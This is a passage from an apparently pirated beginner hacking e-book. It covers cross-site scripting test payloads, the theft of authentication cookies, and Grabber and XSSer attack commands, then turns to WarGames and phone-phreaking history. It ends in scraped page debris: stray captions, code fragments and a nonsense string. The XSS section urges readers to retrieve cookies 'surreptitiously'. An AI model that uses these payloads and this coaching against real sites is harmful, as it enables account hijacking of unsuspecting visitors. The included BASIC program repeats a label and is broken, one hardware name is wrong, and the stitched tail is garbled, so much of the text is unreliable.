That is where the similarities to SQL Injection end. As basic script to test for
vulnerabilities is as follows.
<script>alert("XSS");</script>
This will create a little alert pop-up if the code is slipped through the filter. An
attacker has thus managed to determine whether a website is vulnerable
without actually performing an attack, though it will set off alarm bells with
anyone who happens to browse that website. Below I have another example
you can try.
<script>alert(String.fromCharCode(88,83,83))</script>
With an XSS attack it must not be forgotten that the website itself isn’t the true
target, the clients that visit the site are. The holy grail of XSS is obtaining an
authentication cookie that will allow a hacker access through a website portal.
If the cookie belonged to a website to which the client had administrator rights
then the username and password login is bypassed if the hacker uses the cookie
for themselves. After the hacker has managed to retrieve the cookie, which is
the hard part, they only need to copy it into their browser and navigate to that
website to gain access, without inputting a username or password! In the
following paragraph methods for retrieving authentication cookies are
discussed.
With the code below a pop-up is created with the cookie. Of course if clients
see such a pop-up they will become suspicious. You need to retrieve cookies
surreptitiously and be able to store them.
<script>alert(document.cookie);</script>
Malicious URLs
The malicious scripts used by hackers can also be placed in a URL. As soon as
a user clicks the link the script is executed and the XSS attack is under way.
Injecting such as script can be as simple as merely pasting the code behind a
legitimate URL. Of course most people aren’t stupid. Users known not to click
on a link they do not know, especially if they see one in an email. However, the
malicious script can be obfuscated through a service such as tinyURL. This
type of attack is known as “First Order XSS”.
Grabber
As mentioned before XSS attacks are popular. Most websites are to a degree
vulnerable to such an attack. However, determining such vulnerabilities can be
time consuming. Grabber is a scanner that will do most of the grunt work for
you. It will scan designated websites, portals and forums. But be careful. Even
with moderately sized websites Grabber will have difficulty. With larger
websites it becomes impractical. As such it may be necessary for a hacker to
browse their target and narrow down to parts of the website that look
promising for an XSS attack.
root@kali:~# grabber --spider 1 --sql --xss --url
http://targetwebsite.com
As you can see from this sample command Grabber is easy to use. The
switches have the following meaning.
--spider: we state the entire website should be analyzed, I this case to a
depth of 1.
--sql: we also want to check for SQL injection vulnerabilities. It’s a
gimme, but you can leave it out if you want to speed up Grabber.
--xss: switch to check for XSS vulnerabilities.
--url: designate target website.
Grabber is quickly becoming a staple within Kali Linux. Its use goes far
beyond XSS vulnerability detection such as SQL injection, finding back-up
files and JavaScript code analyzing. If you want to see the complete list of
switches just enter ‘grabber –h’ into the Terminal.
XSSER
One of the best tools to perform an XSS attack that is built into the standard
Kali distribution is XSSer. The tools permit the user to detect possible XSS
vulnerabilities of a website and exploit them. The people of the website
SecurityXploded have made a target website available for testing. The tutorial
below will use that as an example, but any website detected with Grabber will
do.
Below is an example attack command. As you can see XSSer has no shortage
of switches.
root@kali:~# xsser -u 'http://testasp.vulnweb.com' -g 'Search.asp?
tfSearch=' -proxy 'http://127.0.0.1:8118? -referer '666.666.666.666? -
user-agent 'correct audit' -Fuzz –s
Meaning behind the switches
-u: means we have a target URL.
-g: enter the payload using GET method
-proxy: use a proxy server, standard is Tor using port 8118
-referer: use the HTTP referrer header from the default NONE
-user-agent: change the HTTP User-Agent header from the default
SPOOFED
-Fuzz: check if input is sanitized
If you find XSSer intimidating to use in Terminal than switch over to the GUI
application with the following command.
root@kali:~# xsser --gtk
XSS attacks are difficult to complete, but the above explanation should be
enough. Try to get to know tools such as Grabber and XSSer in-depth. A lot of
these tools are similar, but you should focus on those with a large support
community.
https://rjlipton.wordpress.com/2009/02/27/where-are-the-movies-on-pnp/
http://www.usc.edu/dept/molecular-science/fm-sneakers.htm
EXTRA:
WarGames
The murky beginnings of hacking
Back in the early 80’s the first personal computers had only just started to seep
through into society. Chances were you didn’t have one, neither did your friend
or your neighbors. However, you’re teacher might have one and the
acquaintance working for that big tech firm might have one at home. People did
know that computers could communicate through the telephone. The 1983
movie WarGames is about David Lightman, played by Matthew Broderick, a
teenage kid and a bit of a recluse who uses his computer to hack into NORAD
and play war games with the simulator WOPR. Of course David doesn’t know
he hacked into NORAD. David thinks it is a tech firm with military
connections somewhere in Sunnyvale California. Joshua, the real name given
to WOPR by its original designer accepts David’s offer to play a game, one
entitled ‘Global thermonuclear war’. The game is in fact a simulation of a
World War 3 scenario. The techies of Strategic Air Command at NORAD can’t
tell the difference and think that David’s attempt to defeat Joshua is an actual
Soviet attack. It is only later that David learns on the news that the US military
was placed on high-alert.
Before long David is in over his head as the FBI arrests him. He tries to
convince them in vain that the WOPR simulation is not real and that the nuclear
missiles shouldn’t be launched. Only after escaping the clutches of the FBI and
consulting Joshua’s original designer Dr. Stephen Falken, played by John
Wood, does he manage to convince the authorities it has all been a ghastly
mistake.
WarGames is very much a child of its time. Though everything that happens
would have been possible in 1983 when the movie was released, at least in
theory. The spectacular NORAD set at the time cost over 1 million dollars to
build and certainly helped in creating the notion that hacking could be
dangerous beyond just being a nuisance. Director John Badham readily admits
that he tapped into the common fears and misunderstandings people had about
computers in the early 80s. Some of those fears persist. One example was
when hacker Kevin Mitnick (The Condor) was held in solitary confinement
because prosecutors convinced a judge that by merely whistling into a phone
he could launch a nuclear missile[13]. Kevin Mitnick has written several books
on his hacking exploits, especially those relating to social engineering, which
are still relevant today.
The hacking methods used by the David Lightman have their basis in phone
phreaking, that is, using the telephone communication system that the US had at
the time to get free calls and detect who the persons where using a certain
number. Unlike those phone-phreakers from the 60’s David uses an automated
process with his personal computer. Much of the technical stuff is now
obsolete as is phone-phreaking in general. However, the methods David uses
to obtain information about his targets are still hacker 101, such as Wardialing.
Though phreaking has its murky origins in the 1950s its golden age came when
Joe Engressia (JoyBubbles) learned how to whistle at the right tone to reset the
phone switches. This skill was used to by him to sell long-distance phone calls
to friends and acquaintances. Similarly, John Draper discovered that the
plastic whistle included as free gifts with the Captain Crunch cereal box would
also allow phone-users to reset switches. John Draper later on used the handle
Captain Crunch. The tone that was required to reset the switches was 2600 Hz.
John Draper also constructed what are known as a Blue Box, multifrequency
tone generator, that could automate the process of resetting switches. Such a
design was used by AT&T in-house.
Figure 58. Steve Jobs and Steve Wozniak
After Draper got into difficulties with the law he taught his skills to build blue-
boxes to Steve Wozniak and Steve jobs who together would cofound Apple
Computers just a few short years later. Draper would in the late 70s also write
a BASIC cross-compiler for the Apple 2. At around the same time Microsoft
cofounders Bill Gates and Paul Allen developed Altair BASIC for the Altair
8800, one of the first personal computers developed in 1974 and sold by mail
order. The computer used by David Lightman in WarGames is an IMSAI
8080[14], a clone of the Altair 8080.
Figure 59 Paul Allen and Bill Gates, Altair Basic tape to the right
Early personal computers such as those developed by members of the
Homebrew Computer Club used variants of BASIC. The language was
developed by John G. Kemeny and Thomas E. Kurtz in 1964. Since then the
language has fallen out of favor with C, its variants and Java becoming
dominant. BASIC will mostly be remembered as the language that started the
personal computer revolution when in the mid-1970s a critical mass of
programmers familiar with the languages created the first programs.
Figure 60. Altair clone as used in the movie WarGames
Now BASIC is mostly used by Microsoft as Visual Basic.NET[15]. For Linux
only LibertyBASIC has a working port[16], though the website Run BASIC
supports an online interpreter. Below you can see a small program written in
Run BASIC. Use it, expand it, play with it a little to get the feel of the old
BASIC language!
PRINT "Greetings Professor Falken."
[loopBack]
INPUT "Shall we play a game? "; answer$
IF answer$ = "y" or answer$ = "yes" THEN GOTO [loopBack]
PRINT "Fine";
[loopBack]
INPUT "Type a number between 1 and 10"; number
IF number < 7 THEN [loopBack]
IF number > 7 THEN [loopBack]
IF number = 7 THEN PRINT "Good guess"
Since the 1980s the telephone system has become digitized, thus making
phreaking attacks impossible. However, its legacy continues into the hacking
culture. Two magazines on hacking and counter-culture continue to exist today:
2600: The Hacker Quarterly[17] and PHRACK. The former is still going strong
and is edited by Emmanuel Goldstein (Eric Corley). 2600 is also famous for
regularly organizing hacker conferences: the HOPE series which is a bi-annual
conference held in Manhattan. The next one, HOPE XI should be scheduled for
2016.
A Final note
Dear, after reading through all three parts of this introduction book you will
have learned a lot. Don’t be daunted if you don’t remember a lot. Just
remember you read it somewhere and that you understood it at the time. I
deliberately organized this book so it can also act as a reference text. If you do
intend to pursue the three topics described than there is nothing more useful
than a place where you can find information. At least, until the training wheels
come off.
November 6, 2016
Amsterdam, Netherlands
This E-book was published by SciFiEmpire.net
All rights reserved
(=<`#9]~6ZY32Vx/4Rs+0No-&Jk)"Fh}|Bcy?`=*z]Kw%oG4UUS0/@-
ejc(:'8dc
[1]
http://www.linfo.org/ps.html
[2]
http://www.antonis.de/qbebooks/gwbasman/tron.html
[3]
Balagurusamy, E. (1997). Programming in BASIC. Tata McGraw-Hill
[4]
http://hackforums.net/showthread.php?tid=4169018&highlight=powershell
[5]
http://karwin.blogspot.nl/2012/11/c-pointers-explained-really.html
[6]
http://www.thegeekstuff.com/2011/12/c-pointers-fundamentals/
[7]
https://triviahappy.com/articles/welcome-to-the-net-every-webpage-from-the-1995-
movie-the-net
[8]
http://www.nytimes.com/1994/07/19/science/personal-computers-microsoft-s-new-
system-promises-to-fix-glitches.html
[9]
http://ericsink.com/Browser_Wars.html
[10]
http://starringthecomputer.com/feature.html?f=15
[11]
http://www.wired.com/insights/2013/04/moocs-and-shopping-carts-tracking-digital-
educations-evolution/
[12]
http://www.mediafire.com/file/5tvpocv5gijo0dc/darkc0de.lst
[13]
http://www.cnet.com/news/social-engineering-101-mitnick-and-other-hackers-show-
how-its-done/
[14]
http://www.imsai.net/movies/wargames.htm
[15]
https://en.wikipedia.org/wiki/Visual_Basic_.NET
[16]
http://www.libertybasic.com/
[17]
http://www.2600.com/
[i]
[ii]

Linux, Programming and Hacking For Beginners - J. J. Kane

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Linux, Programming and Hacking For Beginners - J. J. Kane

Uploaded by

Copyright:

Available Formats

www.fullengineeringbook.

First Edition November 2016

Published by SciFiEmpire.net Publishing

Amsterdam, May, 2016.

How This Book Is Structured?

Conventions Used in This Book

The pseudo code I wrote is mostly nonsense, there is no computer programmed

Digital Content & Source Code

Figure 1 Ubuntu GUI with one Terminal open

Figure 2 the command line as an alternative to the GUI

Linux ubuntu 4.2.0-18-generic #22-Ubuntu SMP Fri Nov 6 18:25:50 UTC

This tells us that my computer’s name is ubuntu. Linux ubuntu 4.2.0-18-

Figure 4 using the list command (ls -l -a)

Figure 6. An example run of the mkdir command

Figure 7. The RM command detailed

Figure 8. Variations of the CP command

username@ubuntu:~$ grep “world” world.txt

Grep is very multifunctional. It can easily be combined with other commands

username@ubuntu:~$ grep -i “world” world.txt

As I mentioned grep can be used on conjunction with other commands. An

username@ubuntu:~$ ls | grep ‘world’

username@ubuntu:~$ ls | grep -i *orl*

Figure 9. LS combined with regular expressions

username@ubuntu:~$ ps –ef | grep bash

Figure 10. PS combined with regular expressions

To end top press C-c (Control-c).

Figure 11. example output from running Top

username@ubuntu:~$ kill -9 processnumber

username@ubuntu:~$ ps -ef | grep top

username@ubuntu:~$ kill -9 5414

Figure 12. The kill command with the -9 switch

Figure 13. history shows the latest commands used

Figure 17. Cillian Murphy as Edward Dillinger Jr.

Figure 18 Dillinger uses PS and Grep

Figure 20. Sam uses the touchscreen interface

Figure 21. Using the History command

Figure 23. Find a file called my_file

Figure 24. Editing, compiling and running a C program

Figure 25. Example of Free -m

Figure 27. Keanu Reeves as Neo

Figure 28. Neo meets Trinity

Figure 30. The echo command in Windows

Figure 31. The directory listing command

Figure 32. Ping on google

Figure 33. Tracert on google

lo Link encap:Local Loopback

usb0 Link encap:Ethernet HWaddr ba:d9:53:94:72:8f

Figure 36. Acid Burns displaying her skillz

Figure 37. Angelina Jolie as Acid Burns

Figure 39. The -whatif switch detailed

username@ubuntu:~$ chown root:members /folder

A popular clone of the Vi editor is Vim, which stands for Vi Improved. To

Make sure you have the clisp interpreter/compiler installed with

Figure 41. The GitHub start website

Figure 42. Git and GitHub model

We have now assigned values to three variables. The first is a string of

mydata = raw_input('Type something:')

< less than

if x < 0 || x == 100 || x >= 1000:

Chapter 2 Shell scripting and using

Unlike with Python the indentation is entirely optional; it is simply convenient

# Script to make back-up copies of files in current directory

if [[ $ORIGFILES =~ $UNWANTED ]] #matched

username@ubuntu:~$ ls | grep -i orl

void swapWithReference(int a, int b) {

v = ((rho_s - rho_l)*(D**2)g) / (18n)